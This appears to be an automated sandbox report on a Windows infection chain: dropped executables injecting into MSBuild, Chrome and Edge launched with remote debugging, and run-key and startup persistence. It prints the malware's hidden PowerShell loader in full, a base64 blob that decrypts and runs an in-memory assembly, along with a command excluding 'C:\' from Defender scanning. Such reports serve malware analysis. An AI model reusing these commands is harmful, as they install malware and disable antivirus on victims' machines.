6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6852	msedge.exe
6852	msedge.exe
3988	Constraints.com
3988	Constraints.com
3988	Constraints.com
5504	AddInProcess.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
9596	msedge.exe
9596	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3988	Constraints.com
3988	Constraints.com
3988	Constraints.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 1168	4636	random.exe	89
PID 4636 wrote to memory of 1168	4636	random.exe	89
PID 4636 wrote to memory of 1168	4636	random.exe	89
PID 1168 wrote to memory of 3492	1168	rapes.exe	95
PID 1168 wrote to memory of 3492	1168	rapes.exe	95
PID 1168 wrote to memory of 6700	1168	rapes.exe	98
PID 1168 wrote to memory of 6700	1168	rapes.exe	98
PID 6700 wrote to memory of 6740	6700	LJl8AAr.exe	99
PID 6700 wrote to memory of 6740	6700	LJl8AAr.exe	99
PID 6700 wrote to memory of 6740	6700	LJl8AAr.exe	99
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 6700 wrote to memory of 6748	6700	LJl8AAr.exe	100
PID 1168 wrote to memory of 5496	1168	rapes.exe	104
PID 1168 wrote to memory of 5496	1168	rapes.exe	104
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 5496 wrote to memory of 4284	5496	n0hEgR9.exe	105
PID 1168 wrote to memory of 5656	1168	rapes.exe	106
PID 1168 wrote to memory of 5656	1168	rapes.exe	106
PID 1168 wrote to memory of 5656	1168	rapes.exe	106
PID 5656 wrote to memory of 4988	5656	cmd.exe	108
PID 5656 wrote to memory of 4988	5656	cmd.exe	108
PID 5656 wrote to memory of 4988	5656	cmd.exe	108
PID 4988 wrote to memory of 5880	4988	cmd.exe	110
PID 4988 wrote to memory of 5880	4988	cmd.exe	110
PID 4988 wrote to memory of 5880	4988	cmd.exe	110
PID 5880 wrote to memory of 620	5880	powershell.exe	111
PID 5880 wrote to memory of 620	5880	powershell.exe	111
PID 5880 wrote to memory of 620	5880	powershell.exe	111
PID 1168 wrote to memory of 2904	1168	rapes.exe	113
PID 1168 wrote to memory of 2904	1168	rapes.exe	113
PID 1168 wrote to memory of 2904	1168	rapes.exe	113
PID 2904 wrote to memory of 6208	2904	amnew.exe	114
PID 2904 wrote to memory of 6208	2904	amnew.exe	114
PID 2904 wrote to memory of 6208	2904	amnew.exe	114
PID 6208 wrote to memory of 4200	6208	futors.exe	120
PID 6208 wrote to memory of 4200	6208	futors.exe	120
PID 4200 wrote to memory of 2436	4200	v7942.exe	121
PID 4200 wrote to memory of 2436	4200	v7942.exe	121
PID 4200 wrote to memory of 2436	4200	v7942.exe	121
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122
PID 4200 wrote to memory of 5216	4200	v7942.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3464
- C:\Users\Admin\AppData\Local\Temp\random.exe
  "C:\Users\Admin\AppData\Local\Temp\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe
      "C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3492
  - - C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe
      "C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:6700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6740
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe
      "C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:5496
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4284
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4988
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
  - - C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
      "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        5⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6208
      - C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4200
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2436
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:6776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffebc8adcf8,0x7ffebc8add04,0x7ffebc8add10
        9⤵
        
        PID:6824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        9⤵
        
        PID:7052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1532,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1648 /prefetch:3
        9⤵
        
        PID:6904
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2624 /prefetch:8
        9⤵
        
        PID:7120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3280 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5244
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3328 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4268 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:5916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4632 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5196,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5180 /prefetch:8
        9⤵
        
        PID:2580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7ffebb5af208,0x7ffebb5af214,0x7ffebb5af220
        9⤵
        
        PID:3968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
        9⤵
        
        PID:6164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:2
        9⤵
        
        PID:5152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2460,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:8
        9⤵
        
        PID:2904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
